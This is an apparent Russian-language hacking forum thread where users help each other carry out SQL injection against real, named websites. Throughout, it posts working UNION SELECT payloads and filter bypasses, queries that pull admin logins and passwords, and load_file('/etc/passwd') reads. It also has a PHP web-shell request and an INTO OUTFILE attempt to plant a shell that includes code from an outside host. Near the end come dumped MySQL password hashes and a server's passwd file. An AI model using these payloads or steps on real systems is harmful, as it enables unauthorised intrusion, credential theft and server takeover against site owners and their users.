SELECT COUNT(*) FROM forums,topics WHERE forums.frm_id=topics.frm_id AND forums.`active` = '1' AND forums.clb_id= AND forums.frm_id > 100000:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND forums.frm_id > 100000' at line 5
Псоветуйте какой запрос примнить дальше.Оч нужна помощь.
лично я думаю тебе надо искать другие уязвимости т.к. у тебя нет прав и получить данные из бд mysql. в которой как мне кажется и есть та самая желанная таблица с логином и пассом админа,а если ты хочи полутичь чтото из тогочто у тебя есть то http://stars.com.ua/models/_show_whole_kasting.php?page=2&id=-41+union+select+1,2,та колонка которую ты угадаеш,4,5+from+таблица которую ты угадаеш например есть таблица models в которой хранятся имена и т.д. моделей но этоо не че не дает так что либо иши другие уязвимости либо думай какие есть еше таблицы с нужными тебе данными
P.S. нород а не кто не знает хорошего мануала про Oracle просто в гугле все про этот доклад о устроестве oracla а нормального мануала нет:) заране СПС
Спс, буду искать в других местах.Форум самописный, он точно бажный.
а никто не вкурсе, как префикс определить?
Можно ли использовать SQL-инъекцию на форумах версии vBulletin® Version 3.6.7 [&o][&o][&o][&o][&o][&o][&o]
Может кто знает, почему когда я подставляю значение ' or 1=1--
SELECT * FROM music WHERE PCategory='Music' or 1=1--‘ то серв начало глюбить и вместо страниц стали выводится одни скрипты(у всех)?
Ниче там не нашел...=(
из новостей:
Microsoft начала переговоры о возможном слиянии с американской медиакомпанией AOL LLC
aol.com
http://ted.aol.com/
category.php?catID=999999+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,999,15,16,17,18,19,20,21,22,23/*
[link=http://ted.aol.com/authors.php?authorID=999+UNION+SELECT+1,2,3,CHAR(1]http://ted.aol.com/authors.php?authorID=999+UNION+SELECT+1,2,3,CHAR(1[/link] 04,97,99,107,51,100),5,CHAR(104,97,99,107,51,100),7,8/*
<font color="red">Web-defence.ru/forums/</font>
Я новичёк в Sql inj
вот вопрос....знаю кол-во колонок 13
знаю кол-во столбцов тоже 13 =)))
достал вот это .... Access denied for user 'dbu_shurem_1'@'192.168.%' to database 'INFORMATION_SCHEMA'
но я хрен знаю что это....гдето в мануалах упоминалось....это поможет мне для того чтобы достать админа....впринципе я понял что....Вход к доступу INFORMATION_SCHEMA открыт только пользователю под ником dbu_shurem....но как на практике применить незнаю....подскажите...
Привет всем
люди мне нужно помощь у меня есть запрос выводяший данные пользователя
cat=-14+union+select+1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,username,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
MySQL 4 скажите как мне воспользоватся INSERT INTO мне нужен запрос с помощью которого я заменю username:admin password:blabla на username:admin password:qwe ? я чето как не пробовал у меня не получается пишет что не правильный запрос (про права небыло не слова сними мне кажется проблем нету)
Нужна помощь При подстановке -1+union+select+1,2,3,4/* выводится ошибка
Parse error: syntax error, unexpected T_STRING, expecting ']' in /var/www/***/www/proj/***/stats.php(551) : runtime-created function on line 1
Warning: usort() [function.usort]: Invalid comparison function. in /var/www/****/www/proj/*****/stats.php on line 551
Может какие нить другие запросы попробовать?Подскажите
Доброе время суток... есть сайт с инъекцией...
/main.php?cat=410' выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/main.php?cat=410''' at line 1" и ниже самое приятное - сам SQL запрос:
SELECT page FROM cart_pages WHERE page='/main.php?cat=410''
Но если я отправляю запрос /main.php?cat=410'%20UNION%20SELECT%201,2,3/* получаю снова ошибку и сам запрос выглядит так:
SELECT page FROM cart_pages WHERE page='/main.php?cat=410'%20UNION%20SELECT%201,2,3/*'
то есть идет запрос как есть, %20 в пробелы не преобразуются... Логично предположить, что причина в том, что в запрос идет не просто числовой параметр, а URL в принципе (QUERY_STRING)... Обойти можно??? urldecode не помогает! :( Мысли есть?
вместо /main.php?cat=410'%20UNION%20SELECT%201,2,3/*
/main.php?cat=410'/**/UNION/**/SELECT/**/1/*
[link=http://www.knex.com/Shop/home.php?cat=336']http://www.knex.com/Shop/home.php?cat=336'[/link] - можно что то сделать? И ЧТО это за движок? Уже не в первый раз встречаюсь с подобным -
INVALID SQL:
SQL QUERY FAILURE:
Подскажите как просмотреть содержимое полей. Удачно выполнились -1+union+select+1,2,3,4,5,6/* и -1+union+select+1,2,table_name,4,5,6+from+information_schema.tables/* Просмотреть таблицы не могу, выдает стандартную ошибку синтаксиса.
1 Пишу -1+union+select+1,2,table_name,4,5,6+from+information_schema.tables+where+table_name='list_users'/*
вылазиет
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/*******/htdocs/allstat.phtml on line 581
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/********/htdocs/allstat.phtml on line 582
я извеняюсь если это немного не в тему но:
с помощью sql-inj получил админские пароли и в админки есть возможность изменять html страницы и я хчу узнать
1.есть ли html shell(типа<?php system($_GET["cmd"]); ?> на пхп)
2. если есть дайти код плиз мне не надо супер крутые маленький чисто команды выполнять
Я одного не пойму, если нет вывода ошибки, то как я пойму что есть скуля, т.к. вместо ошбки выводится опясть страница, или скажем может это просто фильтрация ковычек? как такие моменты определить[/align]
еще можно подставить выражение например index.php?id=1 и вместо этого написать index.php?id=2-1 и если инект есть тебе откроется index.php?id=1
P.S. внимательней мануалы надо читать!!!!!!
Это вроде dlind, почитай тут
[link=http://www.securitylab.ru/contest/212099.php]http://www.securitylab.ru/contest/212099.php[/link]
всем доброго времени суток!
решил пощюпать один сервак,скормил его Xspyder'у
а тот мне заявляет следущее:
Возможно выполнение атаки "SQL инъекция". "SQL инъекция" – способ нападения на базу данных в обход межсетевой защиты. В этом методе, параметры, передаваемые к базе данных через Web приложения, изменяются таким образом, чтобы изменить выполняемый SQL запрос. Например, добавляя различные символы к параметру, можно выполнить дополнительный запрос совместно с первым.
Нападение может использоваться для следующих целей:
1. Получить доступ к данным, которые обычно недоступны, или получить данные конфигурации системы, которые могут использоваться для дальнейших нападений. Например, измененный запрос может возвратить хешированные пароли пользователей, которые в последствии могут быть расшифрованы методом перебора.
2. Получить доступ к компьютерам организации, через компьютер, на котором находится база данных. Это можно реализовать, используя процедуры базы данных и расширения 3GL языка, которые позволяют доступ к операционной системе.
Запрос для выполнения SQL инъекции:
[link=http://icqnum.ru/modules.php?name=News&topic_id=1&pagenum=']http://icqnum.ru/modules.php?name=News&topic_id=1&pagenum='[/link]
[b]Результат работы[/b]
<...>
" height="14"></td>
</tr>
</table>
</td>
<td bgcolor="#B59D8E" valign="top">1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15, 15' at line 1<br><table width="100%" cellspacing="0" cellpadding="0">
<tr>
<td height="13"><img src="themes/icqnum/images/n3a.gif" width="534" height="13"></td>
</tr>
<t
<...>
как этим можно воспользоваться?и можно ли?
Никак нельзя
никак....
народ, как я понял из прочитанного материала, каждый скрипт, работает с определённой базой данных и правами пользователя, под которым он запущен. я сталкнулся с sql ver 4.1.22 с ограниченными правами, нашёл уязвимость и начал рыть в слепую таблицы. ВОПРОС: можно ли вычислить скрипт, коотрый использует определённую таблицу в бд? т.к. имя подобрал, а какой скрипт её юзает - не знаю... найду скрипт - опрделелю юзера, а может у него прав больше ))
при тренировках sql инъекциям требуют установить Denwer!l Denver установил , создал вирт диск,
написано
У тебя просто нет phpmyadmin там. Все нормально же, ставь туда какие-нибудь скрипты и тестируй их на sql-inj
Error Type:
msxml4.dll (0x80004005)
Expected token ']' found 'NAME'. //siteMapNode[@url='login.asp?topic='-->tariff<--+or+1=@@version--' or @url='login.asp'][not(@roles) or contains(@roles,'?')]
/sdmretail/client/include/common.asp, line 495
https://xxxxxxx/sdmretail/client/login.asp?topic='tariff
Помогите раскурить...
Смотрю один сайт на уязвимость.
Как по мне в нем есть дыра для скульинъекции.
Правда явно она не показана, когда подставляешь в числовой параметр ковычку, просто переходит на главную страницу, я так понял там просто редирект поставлен при любой ошибке скрипта.
Сайт написан на ASP.NET
Но вот что интересное нашел, если в адрес
[link=http://www.site.com/ListArticle.aspx?AreaID=307&Page=1]http://www.site.com/ListArticle.aspx?AreaID=307&Page=1[/link]
поставить [link=http://www.site.com/ListArticle.aspx?AreaID=307&Page=99999999999999]http://www.site.com/ListArticle.aspx?AreaID=307&Page=99999999999999[/link]
то сайт циклится
[link=http://www.site.com/ListArticle.aspx?AreaID=307&Page=99999999999999&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1]http://www.site.com/ListArticle.aspx?AreaID=307&Page=99999999999999&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1&Page=1[/link]
из-за чего это может произходить?
Всем добрый вечер!
Нашёл на одном сайте вот такую ошибку:
[b]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'call from hm2_history where '2008-7-1' + interval 0 day < date + interval -3 hou' at line 1[/b]
Можно ли через эту дырку как-нибудь слить базу пользователей?
[link=http:///]http://www.autoexotica.ru/news/?nid=130' Кто нибудь, раскрутите пожалуйста!
[/link]
нород скажите плиз как быть есть инжект при подставлении " ' " он выдает весь запрос ошибкой как обычно подщитываю кол-во столбцов и когда пишу union+select+1,2...... то он мне выдает другую ошибку где всего лиш 2 столбца :( а если больше или меньше то 1-ю ошибку как быть?
P.S. сам разобрался просто надобыло поставить from и все:)
Приветствую доблестных АКА и прочий знающий люд. Тут такое дело...
Когда бабло на счету заканчивается от WAN меня естесстно отрубают. А вход на льготные ресурсы остается. "Колол" как-то этот ресурс модифицированными SQL-запросами, какие более ли менее мне понятны (туговато у меня пока с этим). На странице с регистрацией для: Подписка на рассылку новостей , забив в поле пароль : 'or'1' = '1' на выходе получил
Добрый вечер, не буду просить чтобы за меня всё сделали и тд ))) ( ну как обычно люди просят типа незнаю сделайте мне всё а я типа буду делать вид что сделал всё сам я ) вот ссылка на сайт http://tls-team.2x4.ru/ , не могу даже проверить на дырку , просто при вводе овтаматом перекидует на главную обратно, единственное что прошу скажите с какой строчки начать и всё, дальше буду сам ))) Сам тока учусь так что не смейтесь ^^
Народ, мануалы мануалами, но ведь надо где-то по практиковаться... подскажите особо дырявые сайты для нубов :)
Народ, помогите советом. Что дальше сделать?
[size=1]
вот сайт дырявый:
http://www.preproject.com/poll/showresult.asp?catid=2'
выдает:[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'catid=2''.
пробую:
http://www.preproject.com/poll/showresult.asp?catid=2+order+by+2
выдает:[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '2' as a valid field name or expression.
вроде понятно, кол-во столбцов не совпадает, тогда почему гонит вот такой запрос:
http://www.preproject.com/poll/showresult.asp?catid=2+order+by+1
выдает:[Microsoft][ODBC Microsoft Access Driver] Syntax error in ORDER BY clause.
пробовал также:
http://www.preproject.com/poll/showresult.asp?catid=2+union+select+0
вылезает в итоге:[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
как быть?
[link=http://www.colocation.fr/list_annonces.php?action=offre&from=home&ville=R?gion%20parisienne&limit=25&select=%20FROM%20actives%20WHERE%20TYPE_ANNONCE='offre'%20AND%20PAYS_APPART='France'%20AND%20(VILLE_APPART='R?gion%20parisienne'%20OR%20VILLE_APPART='Paris')%20AND%20IS_VALID='1'%20AND%20IS_COLOCATION='1'%20ORDER%20BY%20DATE_VALID%20DESC]Ссылка.[/link]
Как видите половина запроса SQL в ссылке можно написать, а первои половины не хватает ( ну там SELECT итд... ).
А через UNION чегото ничего не получается достать из таблицы "admin".
Может кто подскажет что на колдовать надо ?
ЗЫ / Так же пробовал SHOW DATABASE итд ... ничего не показывает, обидно.[>:]
Возможна ли sql-inj на сервере, где не используется переменная id(в url нет обращения к базе через переменную)? Если да, то как обнаружить возможность injection?
Прочёл море статей, но там разобраны только случаи недостаточной фильтрации переменной id.
Нужен наставник для обучения технике скул инжекта в связи с полным отсутствием времени на чтение бредовой литературы. Оплачу web money.
ЗЫ Цели - хорошие, любителей просьба не беспокоить.
аська - 168-739-320.
я нубь[:)] хелп плиз
+union+select+1,2,3,4,5,6,column_name,8+from+information_schema.columns+where+table_name='members'+limit+0,1+/*
получаю:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'members\' limit 0,1 /*' at line 1
версия: 5.0.45-community
название таблиц успешно достал, подскажите в чём проблема.
заранее спс [:)]
[b]fLAMastER[/b], сервер экранирует кавычки.
Народ!!!Помогите,кто хочет!!!
Есть SQl-injection на одном сайте.
Вот-http://www.****.**/index.php?go=news&i=798'
Выводит-1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND enable='true'' at line 1
SELECT * FROM news WHERE id=798\' AND enable='true'
Пробую подобрать столбцы-http://www.****.**/index.php?go=news&i=798+UNION+SELECT+1,2,3,4,хоть до 50.
Выдает ошибку.
Че делать? Заранее спасибо!!!
Нашёл полный путь к серверу [b]/usr/www/proarena.ru/l2/www/public_html/
сам сайт [/b][link=http://www.l2.proarena.ru/?pages=%27]http://www.l2.proarena.ru/[/link]
Как зайти в корневую папку?? Учитывая что доступ разрешён?
[b]Polchik[/b], поставь в конце своего запроса /* чтобы отрезать AND enable='true'
!!! Помогите срочно! У меня трабла с подбором имен таблиц в версии базы 4.1.21. Возможно ли както вытащить с базы имена таблиц?
ссылку дай
http://***/file_sa_details.phtml?id=-79+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18.../* :)
А без ссылки?...
http://shina-disk.com.ru/index.php?categoryID=5 c это ссылкой хоть ктото поможет!? Там при подборе количества колонок при любом раскладе выдает:
The used SELECT statements have a different number of columns
можно было и личку кинуть, если так принципиально. Посмотрю когда, что найду - напишу
[code]Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/dvsorg/public_html/lida/prg/get_vote.php on line 67
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/dvsorg/public_html/lida/prg/get_vote.php on line 78
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/dvsorg/public_html/lida/prg/get_vote.php on line 85[/code]
http://lida.in.ua/prg/get_vote.php вот тут что можно натворить :? или как этим воспользоватся :? :)
Примитивная SQL:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' union select'.
/singleproduct.asp, line 11
При проверки наличия инжекции посредством подстановки ' в параметр могут вылазить сообщения об ошибках, например:
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘…’ at line или PHP: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in z:\home\localhost\www\index.php on line 21. Какие ещё могут быть выводы об ошибках не подскажите?
Всем привет! =)
Вообщем-то я еще новичок в хакинге, но не любитель задавать ламерские вопросы, поэтому обращаюсь к вам, только по причине возникновения весьма необычной ситуации )))
нашел я значит SQL-Injection на сайте http://mqup.mcgill.ca...
ну все тривиально подставил в параметр http://mqup.mcgill.ca/content.php?id=
кавычку... иньект.. поля подобрать оказалось не трудно:
http://mqup.mcgill.ca/content.php?id=-4+union+select+1,2/*
и оба поля принтабельные..
версия 5.0.45 следовательно любимая таблица обретается ))
повезло мне и с лимитами, ибо я довольно быстро добрался до таблички
mqup_admin_acl_users
а в ней и были заветные поля login и password
без труда выташив оттуда пароли (даже не хеши!) я радостно устремился в админку
http://mqup.mcgill.ca/admin/login.php
и тут меня ждал ОБЛОМ - ни один ни друой пароли (ну или логины)НЕ ПОДХОДЯТ!!! не думаю что я мог неправильно их скопировать в поля админки ))) на всякий вбил вручную - без результата! Тогда я вернулся в админскую таблицу, поля enabled для обоих админских акков были установлены в 1! так же там было поле changepassnext и оно было пустым! т.е. все должно работать! но пароли не подходят...
Это, надо сказать мой первый SQL-недовзлом ;-) до этого только пару раз брался за сайты уже когда то ломанные и ломал для тренировки )
Опытные, помогите разобраться )
А кто сказал, что пароли из таблички "mqup_admin_acl_users" есть пароли на вход в админку?
Короче стал я копать дальше, поразмыслив, что и правда я плохо искали пароли просот не туда =) нашел таблицу tblusers (блин больше 1300 таблиц в БД!!!!) но к ней видимо нет доступа. при попытка выборки страница пуста (на это сайте ошибка SQL не выводится).. видимо прав нехватает... посимвольный перебор поможет? знаю колонки все этой табицы )) я просто в переборе не силен а точнее вообще не юзал ни разу...
И еще кстати, вам сайт на растерзание =)
http://www.erf.org.eg/cms.php?id=events_details&news_id=-23+union+select+1,2,3,4,user(),6,version(),8,9,10,11,12,13,14,15,16,17,18+from+mysql.user/*
Как видите, права пользователя многообещающие )) но версия ((( короче. не подобрал я столбцы в mysql.user ...
Кто взломает отпишитесь обязательно )))
извеняюсь есле невтему агде можно почитать про инекцыи мануалы какиенибуть
to [link=http://forum.xakep.ru/showProfile.aspx?memid=74790]ql85[/link]:
http://www.google.ru/search?q=SQL+injection+полный+FAQ
to [link=http://forum.xakep.ru/showProfile.aspx?memid=84126]][3[/link]:
Действительно лоханулся я... вопрос только чьи тода пароли в базе )) и куда их ввести, буду искать...
to its my
У меня например часто вообще не вылетает ничего, при подстановке кавычки пустая страничка выводиться.. тогда просто сравниваю AND+1=2/* b AND+1=1/* ну и соответственно определяется иньекция... бывают и более интересные случаи когда при ошибке тебя выкидывает на главную, а когда подберешь столбцы.. то получаешь вывод ... ;-) за те 3 дня что я занимаюсь иньекциями уже пришлось повидать ) еще бывают забавные случаи. когда принтабельных столбцов нет (хоть подставляй минус к параметру хоть нет) а потом смотрю, случайно, на заголовок страницы на панели задач.. и вижу цифру ))) ну и дальше расручиваю иньекцию с таким вот выводом ) короче. внимание и еще раз внимание )) а еще иногда команды можно только большими буквами вводить.. )
у мня вопрос
с чаво начать чтоб научица
ну на какую тему статтей прочитать
to [link=http://forum.xakep.ru/showProfile.aspx?memid=88389]slenny[/link]:
http://forum.antichat.ru/thread43966.html
и еще че означает [code]%20[/code]
наример[code] news.php?id=-1';%20--[/code]
%20 это код пробела
плиз помогите надо розобратца
вот зашел например на http://____/news.php
вот че дальше
я читал типа надо id=1 или чете наподобе такого
ну короче че с этим делать
пожалуста не бейтесь головами об экран от моей тупости в этом деле)))
[b]Знающие , хэлп ... [/b]
РАзъясните плз вот такую ошибку
[b]Warning[/b]: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
[link=http://www.marketer.ru/node/1923]http://www.marketer.ru/node/1923[/link] - разьясните кому не сложно
как вообше использовать sql у меня просто есть база и виртуальный сервер
в инете полно инфы иль купи номерок журнала Хакер, видео посмотри, почитай
В общем есть сайт, и есть уязвимость
[link=http://uralexpo.ru/index.php?m=1&prev=all&id=']http://uralexpo.ru/index.php?m=1&prev=all&id='[/link]
подобрал кол-во таблиц и известно что там имеется таблица user в ней по моим подозрениям хранится пароль к админке которая находится тут [link=http://uralexpo./]http://uralexpo.[/link] ru/admin
авторизации на сайте нет, следовательно таблица именно для админа!
в общем соорудил такую конструкцию
_[link=http://uralexpo.ru/index.php?m=1&prev=all&id=-1+union+select+null,null,null,null,null,char(39,112,97,115,115,119,111,114,100,39)+from+user+where+id=1+or+1=1]http://uralexpo.ru/index.php?m=1&prev=all&id=-1+union+select+null,null,null,null,null,char(39,112,97,115,115,119,111,114,100,39)+from+user+where+id=1+or+1=1[/link]
но он мне просто выплевывает результат от char, скажите возможно ли вообще при такой конструкции как нибудь выдрать содержимое таблицы?
уже бошка кипит, статей 20 прочел по теме, может где ошибку допустил?!
[Deleted by Admins]
STripper - char нужен чтобы обойти фильтрацию кавычек, в запросе тут он тебе не нужен! ПОПРОБУЙ ВЫБОРКУ НАРПЯМУЮ СДЕЛАТЬ! название таблиц в кавычки заключать не надо, если что =) если не получиться, юзай шифрование в hex. Зашифровать можно наэтом сервисе : http://hack-shop.org.ru/tools-code-encode
Собственно вот :
http://uralexpo.ru/index.php?m=1&prev=all&id=2+union+select+1,concat(login,0x3a,pass),3,4,5,6+from+user--
:-)
1) как влияют на иньекцию [font="arial"][size="2"][font="tahoma"][size="2"]Magic_quotes_gpc? какова их ф-ция
2) что могут значить ошибки: (при запросе ..../mynews.php?id=1'/*)
[/size][/font][/size][/font][b]
Warning[/b]: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [b]/www_host/hosts/-.ru/mynews.php[/b] on line [b]16[/b]
[b]Warning[/b]: mysql_free_result(): supplied argument is not a valid MySQL result resource in [b]/www_host/hosts/-.ru/mynews.php[/b] on line [b]24[/b]
1)Magic_quotes фильтрует кавычки ... вообщем то на иньекцию по большому счету это не влияет вообще :) т.е. не пройдет запрос вида
select column_name from information_schema.tables where table name = 'users'
ибо кавычки будут экранироаны. но стоит зашифровать users например так: 0x7573657273 и составить запрос вида
select column_name from information_schema.tables where table name = 0x7573657273
и кавычки будут уже не нужны =)
2)Может говорить и об иньекте, попробуй к id подставить AND 1=1/* и AND 1=2/* если в первом случае ошибки нет а во втором есть - иньект, учти что помимо прочего иногда фильтруется комментарий (/*) и тогда можно заюзать другой знак конца запроса -- короче тут с опытом )))
[link=http://forum.xakep.ru/showProfile.aspx?memid=112149]sкriпt[/link], спс , понял , завтра попробую =)
[link=http://forum.xakep.ru/showProfile.aspx?memid=112780]LightAlloy[/link], на antichat.ru
http://www.georgiatoday.ge/archive.php?pageNum_archive=-1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15, 15' at line 1
http://www.georgiatoday.ge/archive.php?pageNum_archive=-2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 15' at line 1
http://www.georgiatoday.ge/archive.php?pageNum_archive=-0.1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 15' at line 1
т.е. ошибка только на отрицательное число. Какие могут быть варианты?
[link=http://forum.xakep.ru/showProfile.aspx?memid=112149]sкriпt[/link]
спасибо, теперь врубился...
2 [b]hwr[/b]:
Pashkella! Respect +5! обьясни что за движок и что за баг такой, или дай ссылку, плз! первый раз про это слышу
Кажись догадался. Это бажный движок со стандартными админскими кукисами, в которых нет ни пасса не логина админа =) благодаря чем их можно создать и зайти под админом. Я прав ? :)
прав, прав, баги просто надо читать и версию двига разглядывать:)
а движок ccmail 1.0.1
Сплойт есть на milw0rm
Плюсы ставь быро[:)]
Копаю один сайт, нашел уязвимый сценарий.
Инжекция позволяет полазить по базам, но, почему-то, не по всем.
Обращениями к information_schema.tables выудил имя таблицы vbforum_user.
Но запрос
http://www.host.ru/some_path/?x=-1'+union+select+1,2,3,4,5,6,7,8+from+vbforum_user+limit+0,1/*
выдает:
SELECT * FROM table1 WHERE param='-1' union select 1,2,3,4,5,6,7,8 from vbforum_user limit 0,1/*': 1146: Table 'host.vbforum_user' doesn't exist
Во-первых, почему вдруг ищется таблица host.vbforum_user, а не vbforum_user?
Во вторых, для некоторых таблиц (например users) запрос проходит. Непонятно - данные реально берутся из host.users что ли?
В-третьих, что же делать?
Во первых дыру уже прикрыли, а вторых:
http://www.host.ru/some_path/?x=-1'+union+select+1,2,3,4,5,6,7,8+from+vbforum_user+limit+0,1/*
а что ты собственно выбрать-то хочешь таким запросом - сам-то понимаешь хоть? Или нарочно сюда неправильно вставил? Ну был там хотя бы login или passwd, а так что? Выберите мне 1,2,3,4,5,6,7,8 из таблички vbforum_user???
В принципе готов тебе подсказать что дальше делать и как, но на основе твоего запроса (непонятного) и учитывая тот факт, что дырку прикрыли, не уверен, стоит ли, гы
Ладно, в общем когда решишь, что тебе оттуда надо выбрать (логин, мыло или пароль) делай так:
1. http://www.host.ru/some_path/?x=-1'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,table_schema)+from+information_schema.columns+where+table_name='vbforum_user'+limit+0,1/*
таким образом ты получишь свой "host", гы-гы. А потом уж так:
2. http://www.host.ru/some_path/?x=-1'+union+select+1,2,3,4,5,6,7,login+from+host.vbforum_user+limit+0,1/*
Где host - это то, что мы нашли в пункте 1.
Отвечаю по пунктам.
Дыра жива. www.host.ru - это не точный адрес, просто замаскировал, чтобы не ломанулись сразу все :-)
Таким запросом я просто подбираю число полей и смотрю какие из них показываются в теле.
За выборку table_schema спасибо, недокурил мануалы.
Оказывается можно просматривать таблицы только для одной схемы, для других не хватает прав - SELECT command denied to user 'user'@'localhost' for table 'vbforum_users'
Похоже мало что удастся выудить...
Походу нет таких прав.
Ставлю load_file('/etc/passwd'), load_file(0x2f6574632f706173737764) - поле остается пустым.
version() работает.
Какие еще функции подергать можно для хорошего эффекта? :-)
INTO OUTFILE
INTO DUMPFILE
ну а потом уже
BENCHMARK(100000,BENCHMARK(100000,md5(current_time )))
[:D]
посмотри еще и host
union+select+1,2,3,4,5,6,7,concat_ws(0x2f,user,password,host)+from+mysql.user/*
если в хост стоит % значит можно конектится к БД удаленно под этим узвером
SELECT command denied to user 'user'@'localhost' for table 'user
:-(
Бенчмарк пока отложу, досить цели нет :-)
INTO OUTFILE поковыряю, спасибо.
http://www.sandaldom.ru/?go=katalog&catid=5765&podcatid=3891+union+select+1,2,+TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14+FROM+INFORMATION_SCHEMA.TABLES+limit+1,3/*
[u]ткните носом в ошибку[/u] =)
спс , не посморел
+1
созрел вопрос - как узнать имена таблиц? т.е. не наугад...
[link=http://forum.xakep.ru/showProfile.aspx?memid=47547]Pashkela, [/link]
если не ошибаюсь, Вы где-то выкладывали php брут для подобных целей, может у вас остались исходники?
Ошибаетесь, я его только сейчас пишу:) А вообще смотрите подпись
Как ни стыдно но приходится писать
Составил вот такую интересную конструкцию
'<? @include("http://alfa.md8.ru/atwa.php"); ?>'into_outfile '/hosting/grandtour/forum/custompics/avatar/atwa.php'
Но ответ мне 19
''into_outfile ("/hosting/grandtour/forum/custompics/avatar/atwa.php")
16
По всей видимости эррор в чём загвоздка? Кривой синтаксис?Права на запись есть.
Всё кодирую char() либо хекс
-1+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,0x273c3f2040696e636c7564652822687474703a2f2f656c697a69756d2e6d64382e72752f617477612e70687022293b203f3e27696e746f5f6f757466696c652028222f686f7374696e672f6772616e64746f75722f666f72756d2f637573746f6d706963732f6176617461722f617477612e7068702229,16,17,18,19,20/*
Мож я кривой)Кароче нужен хелп.
P/s заливаю шелл для тех кто не понял
а ты его обзови .jpg
откуда я знаю, оно тебе версию, юзера там показывает ваще?
Она мне всё что хочеш показывает)
Вот эдо[code]
root:7ca8e6c36b615b62
l2:*AA1420F182E88B9E5F874F6FBE7459291E8F4601
storm:42dd60514fb2168d
debian-sys-maint:1ac6f59b66736893
grand:7ca8e6c36b615b62
skom:42dd60514fb2168d
max:2db48e631b12dc54
voip:42dd60514fb2168d
grand_cl:73b0229833932e01
ender:1dbb69846512c38e
tester:378b243e220ca493
it_tech:42dd60514fb2168d
ren:42dd60514fb2168d
abk:7cd28ccc2be2609
altay:378b243e220ca493[/code]
Вот эдо [code]
root@localhost
5.0.22-Debian_0ubuntu6.06.2-log[/code]
Вот эда [code]root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:101:101::/nonexistent:/bin/false syslog:x:102:102::/home/syslog:/bin/false klog:x:103:103::/home/klog:/bin/false cupsys:x:100:106::/home/cupsys:/bin/false messagebus:x:104:107::/var/run/dbus:/bin/false haldaemon:x:108:108:Hardware abstraction layer,,,:/var/run/hal:/bin/false hplip:x:105:7:HPLIP system user,,,:/var/run/hplip:/bin/false gdm:x:106:111:Gnome Display Manager:/var/lib/gdm:/bin/false storm:x:1000:1000:storm,,,:/home/storm:/bin/bash mysql:x:107:114:MySQL Server,,,:/var/lib/mysql:/bin/false postfix:x:109:115::/var/spool/postfix:/bin/false sshd:x:110:65534::/var/run/sshd:/bin/false Debian-exim:x:117:117::/var/spool/exim4:/bin/false majordomo:x:111:1::/home/majordomo:/bin/false avahi:x:118:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false olgatimokhina:x:1001:1001::/hosting/:/bin/bash ntp:x:119:119::/home/ntp:/bin/false bind:x:112:120::/var/cache/bind:/bin/false ftp:x:113:65534::/home/ftp:/bin/false smokeping:x:121:121:SmokePing daemon,,,:/var/lib/smokeping:/bin/false[/code]
Да ещё много чё вот тока я хо шелл залить но вместа шелла какаято ху"та.
Я знаю пассы к мускулю но вот сам сервис найти немогу 3306 порт пуст а PhpMyAdmin я не нашёл
Кстати так бывает BENCHMARK(100000,BENCHMARK(100000,md5(current_time ))) а бенча нет ну сайт говорит окей мол всё а бегает так резво ппц.И никакого дауна.
пробел лишний после current_time
Народ подскажите пожалуйста как этим воспользоваться.
( после скана иксспайдером )
Уязвимость
